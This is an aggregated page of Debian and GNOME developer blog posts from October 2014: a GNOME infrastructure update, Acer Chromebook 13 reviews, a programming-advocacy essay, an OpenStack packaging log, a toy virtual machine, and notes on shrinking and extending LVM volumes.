The migration of all the user data and ACLs has been massive, and I’ve been spending a lot of time reviewing the existing HBAC rules, trying to spot possible errors or misconfigurations. If you happen to be unable to access a certain service you used to have access to, please get in contact with the Sysadmin Team. All the possible ways to contact us are available at https://wiki.gnome.org/Sysadmin/Contact.

What is missing still?

Now that the Foundation membership information has been moved to LDAP, I’ll be looking at porting some of the existing membership scripts to it. What I have managed to port already are the welcome e-mails for new or existing (renewing) members.

Next step will be generating a membership page from LDAP (to populate http://www.gnome.org/foundation/membership) and all the your-membership-is-going-to-lapse e-mails that were being sent till today.

Other news – /home/users mount on master.gnome.org

You will notice that logging in to master.gnome.org now gives you an empty home directory. Don’t worry, you did not lose any of your files; master.gnome.org simply hosts your home directories itself now. As you may have been aware, adding files to the public_html directory on master used to make them appear on your people.gnome.org/~userid space. That was expected, unfortunately, as both master and webapps2 (the machine serving people.gnome.org’s webspaces) were mounting the same GlusterFS share.

We wanted to prevent that behaviour, as we want to know who has access to what resource and where. From today, master’s home directories are there just as a temporary spot for your tarballs: just scp them over and run ftpadmin against them; that should be all you need from master (a sketch follows below). If you are interested in getting or keeping your people.gnome.org webspace, please mail <accounts AT gnome DOT org> stating so.
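
A sketch of that tarball workflow, assuming the usual GNOME release procedure (the module name and version are placeholders):

# copy the release tarball to master, then install it into the FTP tree
scp mymodule-3.14.1.tar.xz master.gnome.org:
ssh master.gnome.org ftpadmin install mymodule-3.14.1.tar.xz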

Other news – a shiny and new error 500 page has been deployed

Thanks to Magdalen Berns (magpie), a new error 500 web page has been deployed on all the Apache instances we host. The page contains an iframe of status.gnome.org and will appear every time the web server behind the service you are trying to reach is unreachable for maintenance or other reasons. While I hope you won’t see the page that often, you can still enjoy it at https://static.gnome.org/error-500/500.html. Make sure to whitelist status.gnome.org in your browser, as the page currently loads it without https (the service is currently hosted on OpenShift, which provides us with a *.rhcloud.com wildcard certificate that differs from the CN the browser would expect).

Updates

UPDATE on status.gnome.org’s SSL certificate: the certificate has been provisioned, and the 500 page should now be displayed correctly, with no warnings from your browser.

UPDATE from Adam Young on Kerberos ports being closed on many DC’s firewalls:

The next version of upstream MIT Kerberos will have support for fetching a ticket via ports 443 and marshalling the request over HTTPS. We’ll need to run a proxy on the server side, but we should be able to make it work:

Read up here
http://adam.younglogic.com/2014/06/kerberos-firewalls

07 October, 2014 09:21AM by Andrea Veri

October 06, 2014

Julian Andres Klode

Acer Chromebook 13 (FHD): Initial impressions

Today, I received my Acer Chromebook 13, in the glorious FullHD variant with 4GB RAM. For those of you who don’t know it, the Acer Chromebook 13 is a 13.3 inch Chromebook powered by a Tegra K1 CPU.


This version cannot be ordered currently; only pre-orders were shipped yesterday (at least here in Germany). I cannot even review it on Amazon (despite having bought it there), as they have not enabled reviews for it yet.

The device feels solidly built and looks good. It comes in all-white matte plastic and is slightly reminiscent of the old white MacBooks. The keyboard is horrible; there’s no well-defined pressure point. It feels like you’re typing on a pillow. The display is OK; an IPS panel would be a lot nicer to work with, though. Oh, and it could be brighter: I do not think that using it outside on a sunny day would be a good idea. The speakers are loud and clear compared to my ThinkPad X230.

The performance of the device is about acceptable (unfortunately, I do not have any comparison in this device class). Even when typing this blog post in the visual WordPress editor, I notice some sluggishness. Opening the app launcher or loading the new-tab page while music is playing makes the music stop or skip for a few ms (20-50 ms if I had to guess). Running a benchmark in parallel or browsing does not usually cause this stuttering, though.

There are still some bugs in Chrome OS: loading the Play Books library for the first time resulted in some rendering issues. The “Browser” process always consumes at least 10% CPU, even when idling with no page open; this might cause some of the sluggishness I mentioned above. Also, watching Flash videos used more CPU than I expected, given that it is hardware accelerated.

Finally, Netflix did not work out of the box, despite the Chromebook shipping with a special Netflix plugin. I always get some “unexpected issue”-type page. Setting the user agent to Chrome 38 on Windows, thus forcing the use of the EME video player instead of the Netflix plugin, makes it work.

I reported these software issues to Google via Alt+Shift+I. The issues appeared on the current version of the stable channel, 37.0.2062.120.

What’s next? I don’t know.


Filed under: Chromebook

06 October, 2014 06:01PM by Julian Andres Klode

A weekend with the Acer Chromebook 13 FHD (AKA nyan-big)

I spent the weekend using almost exclusively my Chromebook 13, on a single charge Saturday and Sunday.

Keyboard

I think I like the keyboard better now than when I first tried it. It gets nowhere near the ThinkPad X230 one, though; apart from the coating, which my (backlit) X230 unfortunately does not have.

Screen

While the screen appeared very grainy to me at first sight, having only used IPS screens in the past year, I got used to it over the weekend. I now do not notice much graininess anymore. The contrast still seems extremely poor, the colors are not vivid, and the vertical viewing angles are still a disaster, though.

Battery life

I think the battery life is awesome. I have 30% remaining now while I am writing this blog post, and Chrome OS tells me I still have 3 hours and 19 minutes left. It could probably still be improved, though: I notice that Chrome OS normally uses 7-14% CPU when idle (and up to 20% in exceptional cases).

The maximum power usage I measured using the battery’s internal sensor was about 9.2W; that was with 5 Big Buck Bunny 1080p videos playing in parallel. Average power consumption is around 3-5W (up to 6.5W with a single video playing), depending on brightness and use.

Performance

While I do notice a performance difference compared to my much more high-end Ivy Bridge Core i5 laptop, the device turns out to be usable enough not to make me want to throw it at a wall. Things take a bit longer than I am used to, but it is still acceptable.

Input: Software Part

The user interface is great. There are a lot of gestures available for navigating between windows and tabs, and in the history. For example, swiping horizontally with two fingers moves through the history, with three fingers it moves between tabs; and swiping down (or up, for Australian scrolling) gives an overview of all windows (like Exposé on Mac, GNOME’s activities, or the multi-tasking view Maemo used to have).

What I miss is a keyboard shortcut like Meta + Left/Right on GNOME, which moves the active window to the left/right side of the screen. That would be very useful for multi-tasking situations.

Issues

I noticed some performance issues. For example, I can easily get the Chromebook to use 85% of a CPU by scrolling on a page with the touchpad, or 70% by scrolling with a key held down (crbug.com/420452).

While watching Big Buck Bunny on YouTube, I noticed some (micro) stuttering in the beginning of the film, as well as each time I move in or out of the video area when not in full-screen mode (crbug.com/420582). It also increases CPU usage to about 70%.

Running a “proper” Linux?

Today, I tried to play around a bit with Debian wheezy and Ubuntu trusty systems, in a chroot for now. I was trying to find out if I can get an accelerated X server with the standard ChromeOS kernel. The short answer is: No. I tried two things:

  1. Debian wheezy with the binaries from ChromeOS (they have the same xserver version)
  2. Ubuntu trusty with the Nvidia drivers

Unfortunately, they did not work. Option 1 failed because ChromeOS uses glibc 2.15 whereas wheezy uses 2.13. Option 2 failed because the sysfs interface is different between the ChromeOS and Linux4Tegra kernels.

I guess I’ll have to wait.
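
In case you want to experiment with similar chroots yourself, they can be created with debootstrap; a rough sketch (I am assuming armhf here, and the target path and mirror are placeholders; Chrome OS keeps its rootfs read-only, so /usr/local is a common spot):

sudo debootstrap --arch=armhf wheezy /usr/local/wheezy http://ftp.debian.org/debian
sudo chroot /usr/local/wheezy /bin/bash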

I also tried booting a custom kernel from USB, but given that the u-boot always sets console= and there is no non-verified u-boot available yet, I could not see any output on the screen :(  – Maybe I should build a u-boot myself?
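
For anyone wanting to try the same: booting from USB on a Chromebook normally has to be enabled from a developer-mode shell first. A sketch, assuming the standard crossystem flags (device-specific, and it weakens verified boot, so beware):

# in developer mode, from a crosh shell (Ctrl+Alt+T, then type "shell")
sudo crossystem dev_boot_usb=1 dev_boot_signed_only=0
# afterwards, Ctrl+U at the boot screen attempts the USB boot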


Filed under: Chromebook

06 October, 2014 06:00PM by Julian Andres Klode

October 05, 2014

Stefano Zacchiroli

je code

je.code(); — promoting programming (in French)

jecode.org is a nice initiative by, among others, my fellow Debian developer and university professor Martin Quinson. The goal of jecode.org is to raise awareness about the importance of learning the basics of programming, for everyone in modern societies. jecode.org targets specifically francophone children (hence the name, for "I code").

I've been happy to contribute to the initiative with my thoughts on why learning to program is so important today, joining the happy bunch of "codeurs" on the web site. My answers, originally in French, are reposted below in English translation. If you write French, you might want to contribute your own thoughts on the matter. How? By forking the project of course!


Why do you code?

First of all, I code because it is a fascinating and fun activity, one that lets you experience the pleasure of creating.

Second, I code to automate the repetitive tasks that can make our digital lives painful. A computer is designed exactly for that: freeing human beings from mindless tasks, so that they can concentrate on the tasks that need human intelligence to be solved.

But I also code for the pure pleasure of hacking, i.e., finding original and unexpected uses for existing software.

How did you learn?

Completely by chance, when I was a kid. At 7 or 8 years old, in the municipal library of my small village, I stumbled upon a book that taught BASIC programming through the metaphor of the game of the goose. From that day on I used my father's Commodore 64 much more for programming than for video games: coding is so much more fun!

Later, in high school, I came to appreciate structured programming and the enormous advantages it brings over BASIC's GO TOs, and I became a Pascal addict. The rest came with university and the discovery of Free Software: the Ali Baba's cave of the curious coder.

What is your favourite language?

I have several favourite languages.

I like Python for its syntactic minimalism, its vast and well-organized community, and for the abundance of tools and resources it offers. I use Python to develop medium/large infrastructure (often equipped with Web interfaces), especially when I want to create a community of contributors around the software.

I like OCaml for its type system and its ability to capture the right properties of complex applications. This allows the compiler to help developers enormously in avoiding both coding and design errors.

I also use Perl and shell scripting (mainly Bash) a lot for task automation: the ability of these languages to glue other applications together is still unmatched.

Why should everyone learn to program, or at least be introduced to it?

We are more and more dependent on software. When we use a dishwasher, drive a car, get treated in a hospital, when we communicate on a social network or surf the Web, our activities are constantly carried out by software. Whoever controls that software controls our lives.

As citizens of an increasingly digital world, if we do not want to become slaves 2.0, we must claim control over the software that surrounds us. To get there, Free Software---which allows us to use, study, modify and redistribute software without restrictions---is an indispensable ingredient. So is the wide diffusion of programming skills: every bit of knowledge in this field makes all of us freer.

05 October, 2014 02:48PM

hackergotchi for Thomas Goirand

Thomas Goirand

OpenStack packaging activity: September 2014

I decided I’d post this monthly. It may be a bit boring, sorry, but I think it’s a nice thing to have this public. The log starts on the 6th, because on the 4th I was back from Debconf (after a day in San Francisco, plus 20 hours of traveling and a 15-hour time difference). It is to be noted that every time something is uploaded in Debian for Icehouse (in Sid), or for Juno (in Experimental), a corresponding backport is also produced for Wheezy.

 

Saturday 6th & Sunday 7th:
– packaged libjs-twitter-bootstrap-wizard (in new queue)
– Uploaded python-pint after reviewing the debian/copyright
– Worked on updating python-eventlet in Experimental, and adding Python3 support. It seems Python3 support isn’t ready yet, so I will probably remove that feature from the package update.
– Tried to apply the Django 1.7 patches for python-django-bootstrap-form. They didn’t work, but Raphael came back on Monday morning with new versions of the patches, which should be good this time.
– Helped the DSA (Debian System Administrators) with the Debian OpenStack cloud. It’s looking good and working now (note: I helped them during Debconf 14).
– Started a page about adding more tasksel tasks: https://wiki.debian.org/tasksel/MoreTasks. It’s looking like Joey Hess is adding new tasks by default in Tasksel, with “OpenStack compute node” and “OpenStack proxy node”. It will be nice to have them in the default Debian installer! :)
– Packaged and uploaded python-dib-utils, now in NEW queue.

Monday 8th:
– Uploaded fixed python-django-bootstrap-form with patch for Django 1.7.
– Packaged and uploaded python-pysaml2.
– Finalized and uploaded python-jingo, which is needed for the python-django-compressor unit tests
– Finalized and uploaded python-coffin which is needed for python-django-compressor unit tests
– Worked on running the unit tests for python-django-compressor, as I needed to know if it could work with Django 1.7. It was hard to find the correct way to run the unit tests, but finally they all passed. I will add the unit tests once coffin and jingo are accepted in Sid.
– Applied patches in the Debian BTS for python-django-openstack-auth and Django 1.7. Uploaded the fixed package.
– Fixed python-django-pyscss compat with Django 1.7, uploaded the result.
– Updated keystone to Juno b3.
– Built Wheezy backports of some JS libs needed for Horizon in Juno, which I already uploaded to Sid last summer:
o libjs-twitter-bootstrap-datepicker
o libjs-jquery.quicksearch
o libjs-spin.js
– Upstreamed the Django 1.7 patch for python-django-openstack-auth:

https://review.openstack.org/119972

Tuesday 9:
– Updated and uploaded Swift 2.1.0. Added swift-object-expirer package to it, together with init script.

Wednesday 10:
Basically, cleaned the Debian BTS of almost all issues today… :P
– Added it.po update to nova (Closes: #758305).
– Backported libvirt 1.2.7 to Wheezy, to be able to close this bug: https://bugs.debian.org/757548 (eg: changed dependency from libvirt-bin to libvirt-daemon-system)
– Uploaded the fixed nova package using libvirt-daemon-system
– Upgraded python-trollius to 1.0.1
– Fixed tuskar-ui to work with Django 1.7. Disabled pep8 tests during build. Added build-conflicts: python-unittest2.
– Fixed python-django-compressor for Django 1.7, and now running unit tests with it, after python-coffin and python-jingo got approved in Sid by FTP masters.
– Fixed python-xstatic wrong upstream URLs.
– Added it.po debconf translation to Designate.
– Added de.po debconf translation to Tuskar.
– Fixed copyright holders in python-xstatic-rickshaw
– Added python-passlib as dependency for python-cinder.

Remaining 3 issues in the BTS: the ceilometer FTBFS, the Horizon unit test with Django 1.7, and Designate failing to install. All 3 are harder to fix, and I may try to do so later this week.

Thursday 11:
– Fixed python-xstatic-angular and python-xstatic-angular-mock to deal with the new libjs-angularjs version (closes 2 Debian RC bugs: uninstallable).
– Fixed ceilometer FTBFS (Closes rc bug)

Friday 12:
– Fixed wrong copyright file for libjs-twitter-bootstrap-wizard after the FTP masters told me, and reuploaded to Sid.
– Reuploaded wrong upload of ceilometer (wrong hash for orig.tar.xz)
– Packaged and uploaded python-xstatic-bootstrap-scss
– Packaged and uploaded python-xstatic-font-awesome
– Packaged and uploaded ntpstat

Monday 15:
– packaged and uploaded python-xstatic-jquery.bootstrap.wizard
– Fixed python-xstatic-angular-cookies to use new libjs-angularjs version (fixed version dependencies)
– Fixed Ceilometer FTBFS (Closes: #759967)
– Backported all python-xstatic packages to Wheezy, including all dependencies. This includes backporting a bunch of nodejs packages which were needed as build-dependencies (around 70 packages…). Filed about 5 or 6 release-critical bugs as some nodejs packages were not buildable as-is.
– Fixed some too restrictive python-xstatic-angular* dependencies on the libjs-angularjs (the libjs-angularjs increased version).

Tuesday 16:
– Uploaded updates to Experimental:
o python-eventlet 0.15.2 (this one took a long time as it needed maintenance)
o oslo-config
o python-oslo.i18n
– Uploaded to Sid:
o python-diskimage-builder 0.1.30-1
o python-django-pyscss 1.0.2-1
– Fixed horizon so that libapache2-mod-wsgi is a dependency of openstack-dashboard-apache and not just openstack-dashboard (in both Icehouse & Juno).
– Removed the last failing Django 1.7 unit test from Horizon. It doesn’t seem relevant anyway.
– Backported python-netaddr 0.7.12 to Wheezy (needed by oslo-config).
– Started working on oslo.rootwrap, though it failed to build in Wheezy with a unit test failure.

Wednesday 17:
– To experimental:
o Uploaded oslo.rootwrap 1.3.0.0~a1. It needed a build-depends on iproute2 because of a new test.
o Uploaded python-oslo.utils 0.3.0
o Uploaded python-oslo.vmware 0.6.0, fixed the sphinx-build conf.py and filed a bug about it: https://bugs.launchpad.net/oslo.vmware/+bug/1370370, plus emailed the committer of the issue (which appeared 2 weeks ago).
o Uploaded python-pycadf 0.6.0
o Uploaded python-pyghmi 0.6.17
o Uploaded python-oslotest 1.1.0.0~a2, including a patch for Wheezy, which I also submitted upstream: https://review.openstack.org/122171/
o Uploaded glanceclient 0.14.0, added a patch to not use the embedded version of urllib3 in requests: https://review.openstack.org/122184
– To Sid:
o Uploaded python-zake_0.1.6-1

Thursday 18:
– Backported zeromq3-4.0.4+dfsg, pyzmq-14.3.1, pyasn1-0.1.7, python-pyasn1-modules-0.0.5
– Uploaded keystoneclient 0.10.1, fixed the saml2 unit tests which were broken using testtools >= 0.9.39. Filed bug, and warned code author: https://bugs.launchpad.net/python-keystoneclient/+bug/1371085
– Uploaded swiftclient 2.3.0 to experimental.
– Uploaded ironicclient 0.2.1 to experimental.
– Uploaded saharaclient, filed a bug about saharaclient expecting an up-and-running keystone server: https://bugs.launchpad.net/python-saharaclient/+bug/1371177

Friday 19:
– Uploaded keystone Juno b3, filed a bug about unit tests downloading with git, since no network access should be performed during a package build (forbidden by Debian policy)
– Uploaded python-oslo.db 1.0.0 which I forgot in the dependency list, and which was needed for Neutron.
– Uploaded nova 2014.2~b3-1 (added a new nova-serialproxy service daemon to the nova-consoleproxy)

Saturday 20:
– Uploaded Neutron Juno b3.
– Uploaded python-retrying 1.2.3 (was missing from depends upload)
– Uploaded Glance Juno b3.
– Uploaded Cinder Juno b3.
– Fixed python-xstatic-angular-mock which had a .pth packaged, as well as the data folder (uploaded debian release -3).
– Fixed missing depends and build-conflicts in python-xstatic-jquery.

Sunday 21:
– Dropped python-pil & python-django-discover-runner from the runtime Depends: of python-django-pyscss, as they are only needed for tests. They also created a conflict, because python-django-discover-runner depends on python-unittest2 and horizon build-conflicts with it.
– Forward-ported the Django 1.7 patches for Horizon. Opened new patch: https://review.openstack.org/122992 (since the old fix has gone away after a refactor of the unit test).
– Uploaded Horizon Juno b3.
– Applied https://review.openstack.org/#/c/122768/ to the keystone package, so that it doesn’t do “git clone” of the keystoneclient during build.
– Uploaded oslo.messaging 1.4.0.0 (which really is 1.4.0) to experimental
– Uploaded oslo.messaging 1.4.0.0+really+1.3.1-1 to fix the issue in Sid/Jessie after the wrong upload (due to Zul’s wrong tagging of Keystone in the 2014.1.2 point release).

Monday 22:
– Uploaded ironic 2014.2~b3-1 to experimental
– Uploaded heat 2014.2~b3-1 (with some fixes for sphinx doc build)
– Uploaded ceilometer 2014.2~b3-1 to experimental
– Uploaded openstack-doc-tools 0.19-1 to experimental
– Uploaded openstack-trove 2014.2~b3-1 to experimental

Tuesday 23:
– Uploaded python-neutronclient with fixed version requirements for cliff and six. The missing version requirement for cliff produced an error in Trove, which I don’t want to happen again.
– Added fix for unit tests in Trove: https://review.openstack.org/#/c/123450/
– Uploaded oslo.messaging 1.4.1 in Experimental, fixing the version conflict with the one in Sid/Jessie. Thanks to Doug Hellmann for doing the tagging. I will need to upload new versions of the following packages with the >= 1.4.1 depends:
– ceilometer
– ironic
– keystone
– neutron
– nova
– oslo-config
– oslo.rootwrap
– oslo.i18n
– python-pycadf
See http://lists.openstack.org/pipermail/openstack-dev/2014-September/046795.html for more explanation about the mess I’m repairing…
– Uploaded designate Juno b3.

Wednesday 24:
– Uploaded oslosphinx 2.2.0.0
– Uploaded update to django-openstack-auth (new last minute requirement for Horizon).
– Uploaded final oslo-config package version 1.4.0.0 (really is 1.4.0)
– Packaged and uploaded Sahara. This needs some tests by someone else as I don’t even know how it works.

Thursday 25:
– Uploaded python-keystonemiddleware 1.0.0-3, fixing CVE-2014-7144: TLS cert verification option not honoured in paste configs. https://bugs.debian.org/762748
– Packaged and uploaded python-yaql, sent a pull request converting print statements into Python3-compatible print function calls: https://github.com/ativelkov/yaql/pull/15
– Packaged and uploaded python-muranoclient.
– Started the packaging of Murano (not finished yet).
– Uploaded python-keystoneclient 0.10.1-2 with the CVE-2014-7144 fix to Sid, with urgency=high. Uploaded 0.11.1-1 to Experimental.
– Uploaded python-keystonemiddleware fix for CVE-2014-7144.
– Uploaded openstack-trove 2014.2~b3-3 with last unit test fix from https://review.openstack.org/#/c/123450/

Friday 26:
– Uploaded a fix for murano-agent, which makes it run as root.
– Finished the packaging of Murano
– Started packaging murano-dashboard, sent this patch to fix the wrong usage of the /usr/bin/coverage command: https://review.openstack.org/124444
– Fixed wrong BASE_DIR in python-xstatic-angular and python-xstatic-angular-mock

Saturday 27:
– uploaded python-xstatic-bootstrap-scss which I forgot to upload… :(
– uploaded python-pyscss 1.2.1

Sunday 28:
– After a long investigation, I found out that the issue when installing the openstack-dashboard package was due to a wrong patch I did for Python 3.2 in Wheezy in python-pyscss. Corrected the patch from version 1.2.1-1 and uploaded version 1.2.1-2; the dashboard now installs correctly. \o/
– Did a new version of an Horizon patch at https://review.openstack.org/122992/ to address Django 1.7 compat.

Monday 29:
– Uploaded new version of python-pyscss fixing the last issue with Python 3 (there was a release critical bug on it).
– Uploaded a fixup for python-django-openstack-auth failing to build in the Sid version, which had been broken since the last upload of keystoneclient (which made some of its API private).
– Uploaded python-glance-store 0.1.8, including Ubuntu patch to fix unit tests.
– Reviewed the packaging of python-strict-rfc3339 (see https://bugs.debian.org/761152).
– Uploaded Sheepdog with fix in the init script to start after corosync (Closes: #759216).
– Uploaded pt_BR.po Brazilian Portuguese debconf templates translation for nova Icehouse in Sid (I had only committed it in Git for Juno).
– Same for Glance.

Tuesday 30:
– Added Python3 support in python-django-appconf, uploaded to Sid
– Upgraded to python-django-pyscss 1.0.3, and fixed broken unit tests with this new release under Django 1.7. Created pull request: https://github.com/fusionbox/django-pyscss/pull/22
– Fixed designate requirements.txt in Sid (Icehouse) to allow SQLA 0.9.x. Uploaded resulting package to Sid.
– Uploaded new Debian fix for python-tooz: kills memcached only if the package scripts started it (plus cleans .testrepository on clean).
– Uploaded initial release of murano
– Uploaded python-retrying with patch from Ubuntu to remove embedded copy of six.py code.
– Uploaded python-oslo.i18n 1.0.0 to experimental (same as before, just bump of version #)
– Uploaded python-oslo.utils 1.0.0 to experimental (same as before, just bump of version #)
– Uploaded Keystone Juno RC1
– Uploaded Glance Juno RC1

05 October, 2014 08:41AM by admin

hackergotchi for Steve Kemp

Steve Kemp

Before I forget, a simple virtual machine

Before I forget, I had meant to write about a toy virtual machine which I've been playing with.

It is register-based with ten registers, each of which can hold either a string or int, and there are enough instructions to make it fun to use.

I didn't go overboard and write a complete grammar, or a real compiler, but I did do enough that you can compile and execute obvious programs.

First compile from the source to the bytecodes:

$ ./compiler examples/loop.in

Mmm bytecodes are fun:

$ xxd  ./examples/loop.raw
0000000: 3001 1943 6f75 6e74 696e 6720 6672 6f6d  0..Counting from
0000010: 2074 656e 2074 6f20 7a65 726f 3101 0101   ten to zero1...
0000020: 0a00 0102 0100 2201 0102 0201 1226 0030  ......"......&.0
0000030: 0104 446f 6e65 3101 00                   ..Done1..

Now the compiled program can be executed:

$ ./simple-vm ./examples/loop.raw
[stdout] register R01 = Counting from ten to zero
[stdout] register R01 = 9 [Hex:0009]
[stdout] register R01 = 8 [Hex:0008]
[stdout] register R01 = 7 [Hex:0007]
[stdout] register R01 = 6 [Hex:0006]
[stdout] register R01 = 5 [Hex:0005]
[stdout] register R01 = 4 [Hex:0004]
[stdout] register R01 = 3 [Hex:0003]
[stdout] register R01 = 2 [Hex:0002]
[stdout] register R01 = 1 [Hex:0001]
[stdout] register R01 = 0 [Hex:0000]
[stdout] register R01 = Done

There could be more operations added, but I'm pleased with the general behaviour, and embedding is trivial. The only two things that make this even remotely interesting are:

  • Most toy virtual machines don't cope with labels and jumps. This does.
    • Even though it was a real pain to go patching up the offsets.
    • Having labels be callable before they're defined is pretty mandatory in practice.
  • Most toy virtual machines don't allow integers and strings to be stored in registers.
    • Now that I've done that, I'm not 100% sure it's a good idea.

Anyway, that concludes today's computer-fun.

05 October, 2014 08:34AM

hackergotchi for Vasudev Kamath

Vasudev Kamath

Note to Self: LVM Shrink Resize HowTo

Recently I had to reinstall a system at the office with Debian Wheezy, and I thought I should use this opportunity to experiment with LVM. Yes, I have not used LVM to date, even though I have been using Linux for more than 5 years now. I know many DD friends who use LVM with LUKS encryption, and I always wanted to try it; but since my laptop is the only machine I have, and it is currently in perfect shape, I didn't dare experiment on it. This reinstall was a golden opportunity for me to experiment and learn something new.

I used a Wheezy CD ISO downloaded with jigdo for the installation. Now I will go a bit off topic and share the USB stick preparation. I mention this because I had not done an installation for quite a while; the last one was during Squeeze times, so as usual I blindly executed the following command.

cat debian-wheezy.iso > /dev/sdb

Surprisingly, the USB stick didn't boot! I was getting "Corrupt or missing ISO.bin". So next I tried preparing it with dd.

dd if=debian-wheezy.iso of=/dev/sdb

Surprisingly, this also didn't work, and I got the same error message as above. That is when I went back to the Debian manual, looked up the installation steps, and found a new way!

cp debian-wheezy.iso /dev/sdb

Look at the destination: it's a device, and voilà, this worked! This is something new I learnt, and I'm surprised how easy it is now to prepare a USB stick. But I still don't get why the first 2 methods failed! If you know, please do share.
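
Whatever the cause was, a cheap sanity check after writing an image is to compare the stick against the ISO byte for byte, up to the image size. A sketch (adjust the device name to your setup):

sync
cmp -n "$(stat -c %s debian-wheezy.iso)" debian-wheezy.iso /dev/sdb && echo "write OK"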

Now, coming back to LVM. I chose LVM when asked about disk partitioning, used the guided partitioning method provided by debian-installer, and ended up with the following layout:

$ lvs
  LV     VG          Attr     LSize  Pool Origin Data%  Move Log Copy%  Convert
  home   system-disk -wi-ao-- 62.34g
  root   system-disk -wi-ao--  9.31g
  swap_1 system-disk -wi-ao--  2.64g

So the guided partitioning of debian-installer allocates about 10G for root and the rest to home and swap. This is not a problem as such, but when I started installing the required software I could see root running out of space quickly, so I wanted to resize root and give it 10G more. For that I needed to reduce home by 10G, which in turn required unmounting the home partition first. Unmounting home from the running system isn't possible, so I booted into recovery mode assuming I could unmount home there, but I couldn't. lsof didn't show anyone using /home; after searching a bit I found the fuser command, and it turned out the kernel itself was using /home, which it had mounted.

$ fuser -vm /home
                     USER        PID ACCESS COMMAND
/home:               root     kernel mount /home

So it isn't possible to unmount /home in recovery mode either. Online materials told me to use a live CD for this, but I didn't have the patience for that, so I just went ahead, commented out the /home mount in /etc/fstab, and rebooted! This time it worked, and /home was not mounted in recovery mode. Now comes the hard part, resizing home; thanks to the TLDP doc on reducing, I could do it with the following steps:

# e2fsck -f /dev/volume-name/home
# resize2fs /dev/volume-name/home 52G
# lvreduce -L-10G /dev/volume-name/home

And now the next part, live-extending the root partition; again thanks to the TLDP doc on extending, the following commands did it:

# lvextend -L+10G /dev/volume-name/root
# resize2fs /dev/volume-name/root
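
As an aside, recent lvm2 versions can resize the filesystem and the logical volume in one step with the -r/--resizefs flag, which drives fsadm (and the fsck) for you. A sketch, assuming your lvm2 build ships fsadm; a backup before shrinking is still a good idea:

# grow root and its filesystem in one go
lvextend -r -L+10G /dev/volume-name/root
# shrink home and its filesystem in one go
lvreduce -r -L-10G /dev/volume-name/home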

And now the important part! Uncomment the /home line in /etc/fstab so it will be mounted normally on the next boot, and reboot! On login I could see my partitions updated:

# lvs
  LV     VG          Attr     LSize  Pool Origin Data%  Move Log Copy%  Convert
  home   system-disk -wi-ao-- 52.34g
  root   system-disk -wi-ao-- 19.31g
  swap_1 system-disk -wi-ao--  2.64g

I've started liking LVM more now! :)

05 October, 2014 06:30AM by copyninja